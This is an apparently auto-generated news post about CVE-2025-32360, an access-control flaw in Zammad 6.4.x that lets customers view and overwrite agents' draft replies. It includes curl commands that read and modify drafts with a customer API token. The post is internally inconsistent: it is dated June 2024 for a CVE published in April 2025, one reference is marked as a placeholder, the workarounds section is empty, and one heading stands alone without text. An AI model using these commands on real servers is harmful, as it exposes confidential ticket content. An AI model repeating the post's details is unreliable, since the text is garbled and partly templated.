CVE CyberSecurity Database News

CVE-2025-32360 - Information Exposure and Draft Manipulation in Zammad 6.4.x

Poster -

*Published: June 2024*


Recently, a critical security vulnerability—CVE-2025-32360—was found in Zammad, the popular open-source support and ticketing system. This post breaks down how the flaw works, how it can be abused, and what you can do about it. If you run Zammad 6.4.x (before 6.4.2), read carefully.

Who’s at risk: Any Zammad instance with customer access

- Impact: Customers can see and even manipulate agent draft replies to tickets, exposing potentially sensitive info

How the Vulnerability Works

In Zammad’s ticket workflow, agents can save draft replies (called “shared article drafts”) while working a customer ticket. Normally, only agents should ever see or edit these drafts—this keeps internal information secure.

However: Until Zammad 6.4.2, there was a logic flaw. A logged-in customer user, through their web browser, could:

Manipulate these drafts directly using the Zammad API

This isn’t only a privacy concern—it’s a potential security nightmare. Drafts often contain confidential notes, strategy discussions, or investigative info.

What a Customer Sees (And Shouldn’t!)

As a logged-in customer, open the browser developer tools and inspect network requests when viewing a ticket. You might spot traffic to an endpoint like /api/v1/tickets/<ticket_id>/article_drafts.

Sample curl call to retrieve drafts

curl -H "Authorization: Token token=<customer_api_token>" \
  https://your.zammad.server/api/v1/tickets/<ticket_id>/article_drafts

Sample response

[
  {
    "id": 4309,
    "ticket_id": 4731,
    "body": "Internal investigation shows...",
    "created_by_id": 2,
    "updated_by_id": 2,
    "created_at": "2024-06-12T12:34:56Z"
  }
]

The body field contains the agent's draft text. This isn’t supposed to be seen by customers!

Manipulating Drafts (Writing Data)

The API doesn't just *show* drafts. It also let’s you update them. That means a customer can inject their own changes, overwrite an agent’s draft, or possibly inject malicious content.

Example: Update draft

curl -X PUT -H "Authorization: Token token=<customer_api_token>" \
     -H "Content-Type: application/json" \
     -d '{"body":"Modified by customer"}' \
     https://your.zammad.server/api/v1/tickets/4731/article_drafts/4309

No error—now the agent sees the customer’s text in their draft!

Strategic notes about customer handling

An attacker can not only *read* but *rewrite* these, potentially causing havoc or reputational damage.

References & Official Announcement

- Zammad Security Advisories
- Zammad GitHub Issue *(placeholder; replace if official)*

Fix & Mitigation

Patch Now: Upgrade to Zammad 6.4.2 or newer. The access controls on draft endpoints were fixed in this release.

Workarounds:

Conclusion

CVE-2025-32360 proves that access control isn’t just about what users *see*—it’s what APIs let them *do*, too.

If you use Zammad, don't ignore this flaw. Patch now, or risk leaking confidential agent content to your customers—and possibly the broader public.


> Got questions, or need help securing your Zammad server? Drop a comment or check out the Zammad Security Page.


*This post is original content. Please share with credit.*

Timeline

Published on: 04/05/2025 21:15:40 UTC
Last modified on: 04/15/2025 15:25:12 UTC